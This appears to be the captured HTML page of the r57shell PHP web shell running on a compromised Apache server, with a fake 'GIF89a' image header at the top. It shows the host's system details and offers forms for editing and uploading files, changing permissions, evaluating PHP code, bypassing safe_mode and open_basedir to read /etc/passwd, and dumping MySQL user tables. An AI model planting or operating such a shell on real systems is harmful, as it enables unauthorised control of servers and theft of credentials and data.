1 | GIF89a; |
---|
2 | |
---|
3 | <!-- Здравствуй Вася --> |
---|
4 | <html> |
---|
5 | <head> |
---|
6 | <title>shell</title> |
---|
7 | <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> |
---|
8 | |
---|
9 | <STYLE> |
---|
10 | tr { |
---|
11 | BORDER-RIGHT: #aaaaaa 1px solid; |
---|
12 | BORDER-TOP: #eeeeee 1px solid; |
---|
13 | BORDER-LEFT: #eeeeee 1px solid; |
---|
14 | BORDER-BOTTOM: #aaaaaa 1px solid; |
---|
15 | } |
---|
16 | td { |
---|
17 | BORDER-RIGHT: #aaaaaa 1px solid; |
---|
18 | BORDER-TOP: #eeeeee 1px solid; |
---|
19 | BORDER-LEFT: #eeeeee 1px solid; |
---|
20 | BORDER-BOTTOM: #aaaaaa 1px solid; |
---|
21 | } |
---|
22 | .table1 { |
---|
23 | BORDER-RIGHT: #cccccc 0px; |
---|
24 | BORDER-TOP: #cccccc 0px; |
---|
25 | BORDER-LEFT: #cccccc 0px; |
---|
26 | BORDER-BOTTOM: #cccccc 0px; |
---|
27 | BACKGROUND-COLOR: #D4D0C8; |
---|
28 | } |
---|
29 | .td1 { |
---|
30 | BORDER-RIGHT: #cccccc 0px; |
---|
31 | BORDER-TOP: #cccccc 0px; |
---|
32 | BORDER-LEFT: #cccccc 0px; |
---|
33 | BORDER-BOTTOM: #cccccc 0px; |
---|
34 | font: 7pt Verdana; |
---|
35 | } |
---|
36 | .tr1 { |
---|
37 | BORDER-RIGHT: #cccccc 0px; |
---|
38 | BORDER-TOP: #cccccc 0px; |
---|
39 | BORDER-LEFT: #cccccc 0px; |
---|
40 | BORDER-BOTTOM: #cccccc 0px; |
---|
41 | } |
---|
42 | table { |
---|
43 | BORDER-RIGHT: #eeeeee 1px outset; |
---|
44 | BORDER-TOP: #eeeeee 1px outset; |
---|
45 | BORDER-LEFT: #eeeeee 1px outset; |
---|
46 | BORDER-BOTTOM: #eeeeee 1px outset; |
---|
47 | BACKGROUND-COLOR: #D4D0C8; |
---|
48 | } |
---|
49 | input { |
---|
50 | BORDER-RIGHT: #ffffff 1px solid; |
---|
51 | BORDER-TOP: #999999 1px solid; |
---|
52 | BORDER-LEFT: #999999 1px solid; |
---|
53 | BORDER-BOTTOM: #ffffff 1px solid; |
---|
54 | BACKGROUND-COLOR: #e4e0d8; |
---|
55 | font: 8pt Verdana; |
---|
56 | } |
---|
57 | select { |
---|
58 | BORDER-RIGHT: #ffffff 1px solid; |
---|
59 | BORDER-TOP: #999999 1px solid; |
---|
60 | BORDER-LEFT: #999999 1px solid; |
---|
61 | BORDER-BOTTOM: #ffffff 1px solid; |
---|
62 | BACKGROUND-COLOR: #e4e0d8; |
---|
63 | font: 8pt Verdana; |
---|
64 | } |
---|
65 | submit { |
---|
66 | BORDER-RIGHT: buttonhighlight 2px outset; |
---|
67 | BORDER-TOP: buttonhighlight 2px outset; |
---|
68 | BORDER-LEFT: buttonhighlight 2px outset; |
---|
69 | BORDER-BOTTOM: buttonhighlight 2px outset; |
---|
70 | BACKGROUND-COLOR: #e4e0d8; |
---|
71 | width: 30%; |
---|
72 | } |
---|
73 | textarea { |
---|
74 | BORDER-RIGHT: #ffffff 1px solid; |
---|
75 | BORDER-TOP: #999999 1px solid; |
---|
76 | BORDER-LEFT: #999999 1px solid; |
---|
77 | BORDER-BOTTOM: #ffffff 1px solid; |
---|
78 | BACKGROUND-COLOR: #e4e0d8; |
---|
79 | font: Fixedsys bold; |
---|
80 | } |
---|
81 | BODY { |
---|
82 | margin-top: 1px; |
---|
83 | margin-right: 1px; |
---|
84 | margin-bottom: 1px; |
---|
85 | margin-left: 1px; |
---|
86 | } |
---|
87 | A:link {COLOR:red; TEXT-DECORATION: none} |
---|
88 | A:visited { COLOR:red; TEXT-DECORATION: none} |
---|
89 | A:active {COLOR:red; TEXT-DECORATION: none} |
---|
90 | A:hover {color:blue;TEXT-DECORATION: none} |
---|
91 | </STYLE></head><body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> |
---|
92 | <tr><td bgcolor=#cccccc width=160><font face=Verdana size=2> |
---|
93 | <font face=Webdings size=6><b>!</b></font><b> r57shell SpyGrup.Org SpeciaL</b> |
---|
94 | </font></td><td bgcolor=#cccccc><font face=Verdana size=-2> <b>24-06-2007 12:21:51</b> <font color=black>[</font> <a href=/files/r57.php?phpinfo title="Show phpinfo()"><b>phpinfo</b></a> <font color=black>]</font> <font color=black>[</font> <a href=/files/r57.php?phpini title="Show variables from php.ini"><b>php.ini</b></a> <font color=black>]</font> <font color=black>[</font> <a href=/files/r57.php?cpu title="View cpu info"><b>cpu</b></a> <font color=black>]</font> <font color=black>[</font> <a href=/files/r57.php?mem title="View memory info"><b>mem</b></a> <font color=black>]</font> <font color=black>[</font> <a href=/files/r57.php?tmp title="Delete temp files"><b>tmp</b></a> <font color=black>]</font> <font color=black>[</font> <a href=/files/r57.php?delete title="Delete script from server"><b>delete</b></a> <font color=black>]</font><br> safe_mode: <b><font color=green>ON</font></b> PHP version: <b>4.3.9</b> cURL: <b><font color=green>ON</font></b> MySQL: <b><font color=green>ON</font></b> MSSQL: <b><font color=red>OFF</font></b> PostgreSQL: <b><font color=red>OFF</font></b> Oracle: <b><font color=red>OFF</font></b><br> Disable functions : <b><font color=green>NONE</font></b><br> HDD Free : <b>133.51 GB</b> HDD Total : <b>208.61 GB</b></font></td></tr><table> |
---|
95 | <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> |
---|
96 | <tr><td align=right width=100><font face=Verdana size=-2><font color=blue><b>uname -a : <br>sysctl : <br>$OSTYPE : <br>Server : <br>id : <br>pwd : </b></font><br></td><td><font face=Verdana size=-2 color=red><b> Linux bierce 2.6.9-42.0.10.ELsmp #1 SMP Fri Feb 16 17:17:21 EST 2007 i686<br> -<br> <br> Apache/2.0.52 (Red Hat) DAV/2 FrontPage/5.0.2.2635 mod_ssl/2.0.52 OpenSSL/0.9.7a<br> user=apache uid=48 gid=48<br> /vservers/dreamsma/htdocs/files</b></font></font></td></tr></table><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font face=Verdana size=-2>Executed command: <b>safe_dir</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>ACCESS DENIED</textarea></div></b></td></tr></table><table width=100% cellpadding=0 cellspacing=0><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Work in safe_mode ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>Work directory <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=dir size=85 value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="safe_dir"> <input type=submit name=submit value="Change"></td></tr></table></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Edit files ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>File for edit <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=e_name size=85 value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="edit_file"><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"> <input type=submit name=submit value="Edit file"></td></tr></table></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Create/Delete File/Dir ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>name <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mk_name size=54 value="new_name"> <select name=action><option value=create>Create</option><option value=delete>Delete</option></select> <select name=what><option value=file>file</option><option value=dir>dir</option></select><input type=hidden name=cmd value="mk"><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"> <input type=submit name=submit value="Create/Delete"></td></tr></table></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Chown/Chgrp/Chmod ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>Command <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select> <b>param1 <font face=Wingdings color=gray>и</font></b> <input type=text name=param1 size=40 value="filename"> <b>param2 <font face=Wingdings color=gray>и</font></b> <input type=text name=param2 title="Second commands param is: |
---|
97 | - for CHOWN - name of new owner or UID |
---|
98 | - for CHGRP - group name or GID |
---|
99 | - for CHMOD - 0777, 0755..." size=26 value="0777"><input type=hidden name=cmd value="ch_"><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"> <input type=submit name=submit value="Execute"></td></tr></table></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Find text in files ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>Find text <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=s_text size=85 value="text"> <input type=submit name=submit value="Find"></td></tr><tr class=tr1><td class=td1 width=15% align=right><b>In dirs <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=s_dir size=85 value="/vservers/dreamsma/htdocs/files"> * ( /root;/home;/tmp )</td></tr><tr class=tr1><td class=td1 width=15% align=right><b>Only in files <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=checkbox name=m id=m value="1"><input type=text name=s_mask size=82 value=".txt;.php">* ( .txt;.php;.htm )<input type=hidden name=cmd value="search_text"><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"></td></tr></table></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Search text in files via find ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>Text for find <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=s_text size=85 value="text"> <input type=submit name=submit value="Find"></td></tr><tr class=tr1><td class=td1 width=15% align=right><b>Find in folder <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=s_dir size=85 value="/vservers/dreamsma/htdocs/files"> * ( /root;/home;/tmp )</td></tr><tr class=tr1><td class=td1 width=15% align=right><b>Find in files <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=s_mask size=85 value="*.[hc]"> * you can use regexp<input type=hidden name=cmd value="find_text"><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"></td></tr></table></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Eval PHP code ::</div></b></font></td></tr><tr><td><font face=Verdana size=-2><div align=center><textarea name=php_eval cols=100 rows=3>/* delete script */ |
---|
100 | //unlink("r57shell.php"); |
---|
101 | //readfile("/etc/passwd");</textarea><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="php_eval"><br> <input type=submit name=submit value="Execute"></font></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Test bypass open_basedir with cURL functions ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>Cat file <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=test1_file size=85 value="/etc/passwd"><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="test1"> <input type=submit name=submit value="Test"></td></tr></table></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Test bypass safe_mode with include function ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>Cat file <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=test2_file size=85 value="/etc/passwd"><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="test2"> <input type=submit name=submit value="Test"></td></tr></table></td></tr></form><form name=form method=POST><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Test bypass safe_mode with load file in mysql ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>Database <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=test3_md size=15 value="mysql"> <b>Login <font face=Wingdings color=gray>и</font></b><input type=text name=test3_ml size=15 value="root"> <b>Password <font face=Wingdings color=gray>и</font></b><input type=text name=test3_mp size=15 value="password"> <b>Port <font face=Wingdings color=gray>и</font></b><input type=text name=test3_port size=15 value="3306"></td></tr><tr class=tr1><td class=td1 width=15% align=right><b>Cat file <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=test3_file size=96 value="/etc/passwd"><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="test3"> <input type=submit name=submit value="Test"></td></tr></table></td></tr></form><form name=upload method=POST ENCTYPE=multipart/form-data><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Upload files on server ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr class=tr1><td class=td1 width=15% align=right><b>Local file <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=file name=userfile size=85 value=""></td></tr><tr class=tr1><td class=td1 width=15% align=right><b> New name <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=checkbox name=nf1 id=nf1 value="1"><input type=text name=new_name size=82 value=""><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"> <input type=submit name=submit value="Upload"></td></tr></table></td></tr></form><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: Databases ::</div></b></font></td></tr><tr><td><table class=table1 width=100% align=center><tr><form name=form method=POST><td valign=top width=34%><table class=table1 width=100% align=center><font face=Verdana size=-2><b><div align=center>Show database structure</div></b></font><tr class=tr1><td class=td1 width=45% align=right><b>Type <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Port <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=db_port size=15 value="3306"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Login <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_l size=15 value="root"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Password <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_p size=15 value="password"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>show tables <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="db_show"><input type=checkbox name=st id=st value="1"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>show columns <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=checkbox name=sc id=sc value="1"></td></tr><tr class=tr1><td class=td1 width=45% align=right></td><td class=td1 align=left><input type=submit name=submit value="Show"></td></tr></table></td></form><form name=form method=POST><td valign=top width=33%><table class=table1 width=100% align=center><font face=Verdana size=-2><b><div align=center>Dump database table</div></b></font><tr class=tr1><td class=td1 width=45% align=right><b>Type <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Port <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=db_port size=15 value="3306"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Login <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_l size=15 value="root"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Password <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_p size=15 value="password"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Database <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_db size=15 value="mysql"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Table <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_tbl size=15 value="user"></td></tr><tr class=tr1><td class=td1 width=45% align=right><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="mysql_dump"><b>Save dump in file <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=checkbox name=dif id=dif value="1"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>file <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=dif_name size=15 value="dump.sql"></td></tr><tr class=tr1><td class=td1 width=45% align=right></td><td class=td1 align=left><input type=submit name=submit value="Dump"></td></tr></table></td></form><form name=form method=POST><td valign=top width=33%><table class=table1 width=100% align=center><font face=Verdana size=-2><b><div align=center>Run SQL query</div></b></font><tr class=tr1><td class=td1 width=45% align=right><b>Type <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Port <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=db_port size=15 value="3306"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Login <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_l size=15 value="root"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Password <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_p size=15 value="password"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>Database <font face=Wingdings color=gray>и</font></b></td><td class=td1 align=left><input type=text name=mysql_db size=15 value="mysql"></td></tr><tr class=tr1><td class=td1 width=45% align=right><b>SQL query <font face=Wingdings color=gray>и</font></b><input type=hidden name=dir value="/vservers/dreamsma/htdocs/files"><input type=hidden name=cmd value="db_query"></td><td class=td1 align=left></td></tr></table><div align=center><textarea cols=35 name=db_query>SHOW DATABASES; |
---|
102 | SELECT * FROM user;</textarea><br><input type=submit name=submit value="Execute"></div></td></form></tr></table> |
---|